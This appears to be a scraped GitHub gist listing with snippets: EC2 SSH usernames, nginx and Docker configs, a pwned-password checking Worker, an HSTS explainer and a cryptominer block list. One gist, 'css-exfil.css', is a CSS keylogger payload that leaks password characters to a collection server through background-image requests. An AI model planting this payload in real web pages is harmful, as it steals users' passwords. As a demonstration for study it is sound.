| OS/Distro | Official AMI ssh Username | Legacy / Community / Other AMI ssh Usernames |
|---|---|---|
| Amazon Linux | ec2-user | |
| Ubuntu | ubuntu | root |
| Debian | admin | root |
| RHEL 6.4 and later | ec2-user | |
| RHEL 6.3 and earlier | root | |
| Fedora | fedora | ec2-user, root |
| Centos | centos | root |
| SUSE | root |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Look here for more config file examples: | |
| # https://github.com/verdaccio/verdaccio/tree/master/conf | |
| # | |
| # path to a directory with all packages | |
| storage: ./storage | |
| auth: | |
| htpasswd: | |
| file: ./htpasswd |
hasantayyar
/ Dockerfile
Created
April 25, 2018 13:37
— forked from ju2wheels/Dockerfile
Docker Dockerfile reference template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Last updated: 08/24/2916 | |
| # | |
| # Total instructions available: 18 | |
| # | |
| # https://docs.docker.com/engine/reference/builder/ | |
| # | |
| # You can use a .dockerignore file in the same context directory as | |
| # your Dockerfile to ignore files in the context before sending them | |
| # to the Docker daemon for building to speed up building. |
hasantayyar
/ pwnd.js
Created
February 27, 2018 13:16
— forked from jgrahamc/pwnd.js
Cloudflare Workers that adds an "Cf-Password-Pwnd" header to a POST request indicating whether the 'password' field appears in Troy Hunt's database of pwned passwords.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| addEventListener('fetch', event => { | |
| event.respondWith(fetchAndCheckPassword(event.request)) | |
| }) | |
| async function fetchAndCheckPassword(req) { | |
| if (req.method == "POST") { | |
| try { | |
| const post = await req.formData(); | |
| const pwd = post.get('password') | |
| const enc = new TextEncoder("utf-8").encode(pwd) |
hasantayyar
/ css-exfil.css
Created
February 21, 2018 16:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input[type="password"][value$=" "] { background-image: url("http://localhost:3000/+"); } | |
| input[type="password"][value$="!"] { background-image: url("http://localhost:3000/%21"); } | |
| input[type="password"][value$="\""] { background-image: url("http://localhost:3000/%22"); } | |
| input[type="password"][value$="#"] { background-image: url("http://localhost:3000/%23"); } | |
| input[type="password"][value$="$"] { background-image: url("http://localhost:3000/%24"); } | |
| input[type="password"][value$="%"] { background-image: url("http://localhost:3000/%25"); } | |
| input[type="password"][value$="&"] { background-image: url("http://localhost:3000/%26"); } | |
| input[type="password"][value$="'"] { background-image: url("http://localhost:3000/%27"); } | |
| input[type="password"][value$="("] { background-image: url("http://localhost:3000/%28"); } | |
| input[type="password"][value$=")"] { background-image: url("http://localhost:3000/%29"); } |
hasantayyar
/ nginx-cors.conf
Created
February 9, 2018 16:17
— forked from huandu/nginx-cors.conf
Nginx CORS maps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| map $http_origin $allow_origin { | |
| default "$http_origin"; | |
| } | |
| map $request_method $cors_method { | |
| default "allowed"; | |
| "OPTIONS" "preflight"; | |
| } | |
| map $cors_method $cors_max_age { |
hasantayyar
/ nginx-cors.conf
Created
February 9, 2018 16:17
— forked from huandu/nginx-cors.conf
Nginx CORS maps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| map $http_origin $allow_origin { | |
| default "$http_origin"; | |
| } | |
| map $request_method $cors_method { | |
| default "allowed"; | |
| "OPTIONS" "preflight"; | |
| } | |
| map $cors_method $cors_max_age { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ||coinhive.com/lib/* | |
| ||cryptoloot.pro/lib/* | |
| ||cdn.inwemo.com/* | |
| ||coin-have.com/c/* | |
| ||load.jsecoin.com/load/* | |
| ||minero.cc/lib/* | |
| ||ppoi.org/lib/* | |
| ||webmine.cz/* |
hasantayyar
/ nginx.conf
Created
December 5, 2017 17:18
— forked from plentz/nginx.conf
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # to generate your dhparam.pem file, run in the terminal | |
| openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048 |
hasantayyar
/ CloudFlare_HSTS_Note.md
Last active
November 8, 2017 16:52
What is HTTP Strict Transport Security?
HTTP Strict Transport Security (HSTS, RFC 6797) is a header which allows a website to specify and enforce security policy in client web browsers. This policy enforcement protects secure websites from downgrade attacks, SSL stripping, and cookie hijacking. It allows a web server to declare a policy that browsers will only connect using secure HTTPS connections, and ensures end users do not “click through” critical security warnings.
HSTS is an important security mechanism for high security websites. HSTS headers are only respected when served over HTTPS connections, not HTTP.
HSTS generally has the following behavior in user web browsers:
- Insecure HTTP links become secure HTTPS links
- SSL certificate warnings or other errors show an error message and cannot be bypassed by the user